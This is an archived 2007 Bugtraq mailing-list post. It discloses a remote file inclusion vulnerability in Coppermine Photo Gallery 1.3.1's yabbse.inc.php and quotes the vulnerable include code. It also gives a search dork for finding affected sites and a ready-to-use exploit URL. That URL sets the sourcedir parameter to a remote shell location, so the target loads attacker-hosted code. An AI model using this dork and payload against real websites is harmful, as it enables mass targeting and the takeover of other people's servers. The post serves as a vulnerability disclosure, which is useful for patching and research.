| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070807032304.17585.qmail@securityfocus.com>
Date: 7 Aug 2007 03:23:04 -0000
From: master-of-desastor@...mail.com
To: bugtraq@...urityfocus.com
Subject: Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion
Vulnerability
Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability
DoRk:"Powered by Coppermine Photo Gallery"
Vuln. code:
require_once("$sourcedir/Load.php");require_once("$sourcedir/Security.php");
Exploit:
www.server.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL]
Author:Ma$tEr-0F-De$a$t0r